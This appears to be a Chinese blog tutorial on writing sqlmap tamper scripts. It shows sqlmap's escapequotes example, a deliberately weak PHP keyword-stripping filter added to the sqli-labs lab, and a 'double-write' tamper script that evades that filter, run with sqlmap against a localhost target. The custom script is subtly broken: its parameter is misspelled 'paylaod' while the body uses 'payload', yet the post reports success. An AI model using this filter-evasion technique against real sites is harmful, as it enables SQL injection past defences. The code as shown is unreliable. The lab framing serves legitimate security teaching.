借鉴
sqlmap之tamper脚本编写_sqlmap tamper编写-CSDN博客
先看一个tamper的例子
栗子
escapequotes.py
#!/usr/bin/env python
"""
Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
from lib.core.enums import PRIORITY
__priority__ = PRIORITY.NORMAL
def dependencies():
pass
def tamper(payload, **kwargs):
"""
Slash escape single and double quotes (e.g. ' -> \')
>>> tamper('1" AND SLEEP(5)#')
'1\\\\" AND SLEEP(5)#'
"""
return payload.replace("'", "\\'").replace('"', '\\"')
脚本结构为priority变量定义和dependencies、tamper函数定义。
priority定义脚本的优先级,用于有多个tamper脚本的情况。如果你加载多个tamper,谁的优先级高,谁被优先使用。
(优先级共有七个,分别为;LOWEST、LOWER、LOW、NORMAL、HIGH、HIGHER、HIGHEST)
dependencies函数声明该脚本适用/不适用的范围,可以为空。
tamper是主要的函数,接受的参数为payload和**kwargs。返回值为替换后的payload。
这里把引号替换为了\\'。
实践
在sqli_lab1的基础上,我们增加过滤函数
function sqlwaf( $str ) {
$str = str_ireplace( "and", "", $str );
$str = str_ireplace( "or", "", $str );
$str = str_ireplace( "union", "", $str );
$str = str_ireplace( "select", "", $str );
$str = str_ireplace( "sleep", "", $str );
$str = str_ireplace( "group", "", $str );
$str = str_ireplace( "extractvalue", "", $str );
$str = str_ireplace( "updatexml", "", $str );
$str = str_ireplace( "PROCEDURE", "", $str );
return $str;
}
此时我们知道需要用双写来绕过
我们先手动试一下
直接order会报错
双写绕过成功
不加tamper,我们直接尝试一下
不成功
下面我们编写tamper(双写绕过)
from lib.core.enums import PRIORITY
__priority__ = PRIORITY.NORMAL
def dependencies():
pass
def tamper(paylaod,**kwargs):
if payload:
result = payload.replace("OR","oorr").replace("AND", "aandnd").replace("UNION", "ununionion").replace("SELECT", "seleselectct").replace("PROCEDURE", "PROCEPROCEDUREURE").replace("SLEEP", "slesleepep").replace("GROUP", "grogroupup").replace("EXTRACTVALUE", "extractvextractvaluealue").replace("UPDATEXML", "updatupdatexmlexml")
return result
sqlmap.py -u "http://127.0.0.1/sqlI/Less-1/?id=1" --tamper=tamper.py --batch
成功